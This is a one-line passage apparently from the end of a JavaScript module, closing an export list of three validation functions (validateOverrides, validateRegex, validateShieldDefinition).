validateOverrides, validateRegex, validateShieldDefinition };